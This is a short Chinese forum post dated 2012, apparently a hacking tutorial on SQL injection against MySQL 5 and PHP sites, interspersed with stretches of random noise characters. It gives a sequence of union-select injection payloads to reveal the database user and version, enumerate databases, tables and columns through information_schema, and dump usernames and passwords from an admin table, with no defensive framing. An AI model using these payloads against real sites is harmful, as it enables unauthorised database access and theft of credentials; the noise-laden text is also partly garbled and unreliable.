0 a3 h" {& N- [! H
教程内容:Mysql 5+php 注入
: k0 n- f" f; e+ k& r# h8 f, S( C; w2 T, r7 d4 I3 W& w( J
" P/ k* o& P. r% w
0 s. T( v/ W7 y+ L0 Z5 p5 u
一.查看MYSQL基本信息(库名,版本,用户)2 K% y* n1 ?+ L% ]9 p
$ |, A7 V9 s0 r+ \) x }# y
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*% ]& Z$ N% u# O- b- b4 I
7 f% Q6 I3 U! Q* v. Y
二.查数据库
5 B9 r+ t) e# o5 U3 s; t+ t# z. i9 z
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*' Q& k" {' j. i7 A+ i5 G
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
: ^ x( t. o/ i% g6 X# e; K
. Y3 m+ Y& t# M" P三.暴表2 c3 U7 l% _. f0 ]4 q' t9 Z
! ?* V# C d: b* t* q2 h2 vand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
& G( T. O; _% W7 J3 k! k. s
/ B1 P' N p, _/ N$ v5 Tlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。4 R( z( P! ]7 w
9 C9 h$ s+ E% p4 K* h四.暴字段+ h( n' c N4 ^
( M8 Y. c7 y9 k" o( n4 F* O9 r
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
- ?/ D1 M; y: K0 j; f: y1 {5 Z
! z5 J; L1 m+ s4 w) f- tlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。7 J! P* t+ E; ~9 ?: T
+ P2 i- m1 z5 D% ?3 {9 w) [五.暴数据
- |; d7 h8 f( g3 d- j: l4 M7 h, E7 n K9 _+ P8 ?; E) M
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
. Y( `- W' }) I$ j1 b) E# N- J- |& u& ^7 w; P
# o; N/ b5 l7 z% `) [7 r( e, j
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。3 t L/ g5 V9 i
|
发表于 2012-9-13 16:27:53
收藏
支持
反对